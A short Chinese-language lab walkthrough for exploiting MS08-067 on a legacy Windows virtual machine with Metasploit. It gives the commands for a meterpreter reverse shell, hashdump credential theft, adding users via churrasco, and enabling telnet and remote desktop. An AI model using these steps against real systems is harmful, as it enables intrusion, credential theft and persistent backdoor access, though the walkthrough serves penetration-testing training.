拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器
msfconsole进入msf控制台
输入search ms0-067
找到相应模块
use exploit/windows/smb/ms08_067_netapi 使用相应模块
set PAYLOAD windows/meterpreter/reverse_tcp 设置反弹连接
show options 查看设置选项
set RHOST 192.168.80.XX 设置远程主机
set LHOST 192.168.80.YY 设置本地主机
show targets 查看攻击目标系统类型
set target 1 目标机器为2000
exploit
利用ms10-010漏洞时进行exploit时
help sessions
sessions -l
sessions -i 1
等待攻击成功,出现meterpreter>
输入help查看可以使用命令
ipconfig 查看对方IP地址
hashdump获取对方hash值
shell使用shell命令,CTRL+Z进入后台,退出exit
shutdown远程关机
还可以上传下载文件等等,
上传cmd文件,和churrasco文件,然后使用churrasco命令可以执行增加用户等命令
sc config tlntsvr start= auto
sc start tlntsvr
wmic /node:"[full machine name]" /USER:"[domain]\[username]" PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1打开远程主机桌面